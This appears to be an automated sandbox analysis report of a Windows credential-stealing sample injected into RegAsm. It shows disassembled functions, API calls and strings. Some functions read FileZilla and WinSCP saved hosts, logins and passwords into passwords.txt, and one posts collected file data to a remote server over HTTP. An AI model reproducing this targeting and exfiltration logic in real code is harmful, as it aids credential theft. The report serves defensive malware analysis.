                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocNameProcessUser
                                                                                    • String ID:
                                                                                    • API String ID: 1206570057-0
                                                                                    • Opcode ID: 669fae420ee6eb1cdbbca0cf155bea1fe1a262ab4713cf9ebff3bc65d35779fa
                                                                                    • Instruction ID: 717baa134c2685402ab052e767e48c87ea90d479ce835390d18d57d128390497
                                                                                    • Opcode Fuzzy Hash: 669fae420ee6eb1cdbbca0cf155bea1fe1a262ab4713cf9ebff3bc65d35779fa
                                                                                    • Instruction Fuzzy Hash: 90D05EB6700204FBE7109BA5DE0DE9BBBBCEB84755F400166FB02D2290DAF09A05CA34
                                                                                    Function 0040FE81 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoSystemwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2452939696-0
                                                                                    • Opcode ID: cbe062100e03a9cd5bd2a5b056dc4366336c04a80b9081003c6696508956f941
                                                                                    • Instruction ID: cc392225a4cdd4d81fb3b645c3f3a3bcf8ea132c99b34c9dcf4625544169bb0c
                                                                                    • Opcode Fuzzy Hash: cbe062100e03a9cd5bd2a5b056dc4366336c04a80b9081003c6696508956f941
                                                                                    • Instruction Fuzzy Hash: D8D05B75D0011DD7CF10EB90FC49A8977BCAB04308F4001A1D700F2050E375D61D8BD5
                                                                                    Function 004043AD Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 764stringnetworkmemoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 29 4043ad-4044ac _EH_prolog call 40f95a call 403a54 call 410dac call 40fb4d lstrlenA call 40fb4d call 410dac call 40f923 * 5 StrCmpCA 52 4044ae 29->52 53 4044af-4044b4 29->53 52->53 54 4044d4-4045f4 call 410b5c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40fa28 call 40fa9c call 40f9e1 call 40f98e * 3 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 2 InternetConnectA 53->54 55 4044b6-4044ce call 40fb4d InternetOpenA 53->55 60 404cf2-404d2f call 410a94 * 2 call 40fb14 * 4 call 40f95a 54->60 125 4045fa-40462d HttpOpenRequestA 54->125 55->54 55->60 89 404d34-404db7 call 40f98e * 9 60->89 126 404633-404635 125->126 127 404ce9-404cec InternetCloseHandle 125->127 128 404637-404647 InternetSetOptionA 126->128 129 40464d-404c3f call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4020f3 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fb4d lstrlenA call 40fb4d lstrlenA GetProcessHeap HeapAlloc call 40fb4d lstrlenA call 40fb4d memcpy call 40fb4d lstrlenA memcpy call 40fb4d lstrlenA call 40fb4d * 2 lstrlenA memcpy call 40fb4d lstrlenA call 40fb4d HttpSendRequestA call 410a94 HttpQueryInfoA 126->129 127->60 128->129 334 404c41-404c4e call 40f923 129->334 335 404c53-404c65 call 410a77 129->335 334->89 340 404db8-404dc5 call 40f923 335->340 341 404c6b-404c70 335->341 340->89 343 404cac-404cc1 InternetReadFile 341->343 345 404c72-404c77 343->345 346 404cc3-404cd9 call 40fb4d StrCmpCA 343->346 345->346 347 404c79-404ca7 call 40fa9c call 40f9e1 call 40f98e 345->347 352 404ce2-404ce3 InternetCloseHandle 346->352 353 404cdb-404cdc ExitProcess 346->353 347->343 352->127
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004043B2
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                                      • Part of subcall function 00410DAC: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
                                                                                      • Part of subcall function 00410DAC: GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
                                                                                      • Part of subcall function 00410DAC: HeapAlloc.KERNEL32(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • StrCmpCA.SHLWAPI(?,004259DF,004259DB,004259D3,004259CF,004259CE), ref: 004044A4
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004045E9
                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00404623
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404647
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00425A98,00000000,?,?,00000000), ref: 00404B42
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00404B54
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B66
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00404B6D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00404B7F
                                                                                    • memcpy.MSVCRT ref: 00404B92
                                                                                    • lstrlenA.KERNEL32(00000000,?,?), ref: 00404BA9
                                                                                    • memcpy.MSVCRT ref: 00404BB3
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00404BC4
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404BDD
                                                                                    • memcpy.MSVCRT ref: 00404BEA
                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404BFF
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C10
                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C37
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CB9
                                                                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00404CD1
                                                                                    • ExitProcess.KERNEL32 ref: 00404CDC
                                                                                    • InternetCloseHandle.WININET(?), ref: 00404CEC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$AllocOpenRequestlstrcat$BinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                                                    • String ID: ------$"$"$"$"$--$------$------$------$------$/$ERROR$ERROR$block$build_id$file_data
                                                                                    • API String ID: 2658035217-3274521816
                                                                                    • Opcode ID: c00282e5cd75c8dd74f6355570a176c63ce9ed19f1804046c84903359e236d60
                                                                                    • Instruction ID: 7da96a8239c4269f2075af8d64b6677d5cc6d7227197695578cb8bd043abdbf5
                                                                                    • Opcode Fuzzy Hash: c00282e5cd75c8dd74f6355570a176c63ce9ed19f1804046c84903359e236d60
                                                                                    • Instruction Fuzzy Hash: 2E624EB190014DEADB11EBE0C956BEEBBB8AF18308F50417AE505735C2DB786B4CCB65
                                                                                    Function 0040BBE8 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 370stringmemoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 357 40bbe8-40bca7 _EH_prolog call 40f923 call 410d21 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40f95a call 40618b 380 40c0c4-40c0e8 call 40f98e call 401061 357->380 381 40bcad-40bcbc call 410d6d 357->381 381->380 387 40bcc2-40bd2f strtok_s call 40f923 * 4 GetProcessHeap HeapAlloc 381->387 397 40c00e-40c010 387->397 398 40bd34-40bd42 StrStrA 397->398 399 40c016-40c0bf lstrlenA call 40f923 call 4010b1 call 414437 call 40f98e memset call 40fb14 * 4 call 40f98e * 4 397->399 400 40bd44-40bd72 lstrlenA call 411154 call 40f9e1 call 40f98e 398->400 401 40bd77-40bd85 StrStrA 398->401 399->380 400->401 405 40bdc0-40bdce StrStrA 401->405 406 40bd87-40bdbb lstrlenA call 411154 call 40f9e1 call 40f98e 401->406 410 40bdd0-40be04 lstrlenA call 411154 call 40f9e1 call 40f98e 405->410 411 40be09-40be17 StrStrA 405->411 406->405 410->411 414 40bea2-40beb6 call 40fb4d lstrlenA 411->414 415 40be1d-40be6b lstrlenA call 411154 call 40f9e1 call 40f98e call 40fb4d call 406242 411->415 433 40bffb-40c00c strtok_s 414->433 434 40bebc-40becd call 40fb4d lstrlenA 414->434 415->414 458 40be6d-40be9d call 40f997 call 40fa9c call 40f9e1 call 40f98e 415->458 433->397 434->433 445 40bed3-40bee4 call 40fb4d lstrlenA 434->445 445->433 452 40beea-40befb call 40fb4d lstrlenA 445->452 452->433 462 40bf01-40bff6 lstrcat * 2 call 40fb4d lstrcat * 2 call 40fb4d lstrcat * 3 call 40fb4d lstrcat * 3 call 40fb4d lstrcat * 3 call 40f997 * 4 452->462 458->414 462->433
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040BBED
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    • strtok_s.MSVCRT ref: 0040BCCB
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00425C9B,00425C9A,00425C97,00425C96), ref: 0040BD1F
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040BD26
                                                                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040BD3A
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BD45
                                                                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040BD7D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BD88
                                                                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 0040BDC6
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BDD1
                                                                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040BE0F
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BE1E
                                                                                    • lstrlenA.KERNEL32(?), ref: 0040C019
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • memset.MSVCRT ref: 0040C06C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
                                                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                    • API String ID: 486015307-935134978
                                                                                    • Opcode ID: c68a0f27bc902ea05c839ad39b5d4922081ace22d6ea3294da39bef75c792f8c
                                                                                    • Instruction ID: 255c4b719d3f0515adc493bcbacf9bf61407d1e7a5812a7bdcdf9b10872d254a
                                                                                    • Opcode Fuzzy Hash: c68a0f27bc902ea05c839ad39b5d4922081ace22d6ea3294da39bef75c792f8c
                                                                                    • Instruction Fuzzy Hash: DEE18F71900258EADB11EBE1DC56FEEBB78AF19304F50007AF505B21D2EF781A08CB69
                                                                                    Function 0040E7B8 Relevance: 63.4, APIs: 22, Strings: 14, Instructions: 411registryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040E7BD
                                                                                    • memset.MSVCRT ref: 0040E7E6
                                                                                    • memset.MSVCRT ref: 0040E806
                                                                                    • memset.MSVCRT ref: 0040E81A
                                                                                    • memset.MSVCRT ref: 0040E82E
                                                                                    • memset.MSVCRT ref: 0040E83D
                                                                                    • memset.MSVCRT ref: 0040E84B
                                                                                    • memset.MSVCRT ref: 0040E85C
                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040E884
                                                                                    • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E8AC
                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040E8F3
                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E910
                                                                                    • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,00425C8F), ref: 0040E9A2
                                                                                    • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040E9F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: memset$Value$Open$EnumH_prolog
                                                                                    • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                    • API String ID: 784052110-2798830873
                                                                                    • Opcode ID: 86d90c555041147e3355f381ce4fc8bf561c3cd64d0a3905eecc7d65a5013481
                                                                                    • Instruction ID: 89295896da61250e7cefd1c96a7d7708b6de7757bceb80d1fe37bfb71a37c9ed
                                                                                    • Opcode Fuzzy Hash: 86d90c555041147e3355f381ce4fc8bf561c3cd64d0a3905eecc7d65a5013481
                                                                                    • Instruction Fuzzy Hash: BCF11CB1D0015DAEDB11EBE1CC41FEEBB7CAF18304F5441BBE515B2182DA785A48CB65
                                                                                    Function 00414604 Relevance: 51.8, APIs: 3, Strings: 26, Instructions: 1004stringCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 877 414604-4153f5 _EH_prolog call 40f923 call 40fa9c call 40f9e1 call 40f98e call 4020ed call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fc38 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 410415 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4104a2 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4104dd call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e GetCurrentProcessId call 411001 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 41064b call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 41077c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 410925 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fbfd call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fbcb call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4103a0 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fce5 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fc38 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fc92 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fe18 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40feb4 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fe81 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40ff81 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40ffea call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4102c3 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 410071 call 40fa28 call 40f9e1 call 40f98e * 2 call 410071 call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40f9e1 call 40f98e call 40fb4d lstrlenA call 40fb4d call 40f923 call 4010b1 call 414437 call 40f98e * 2 call 401061
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00414609
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
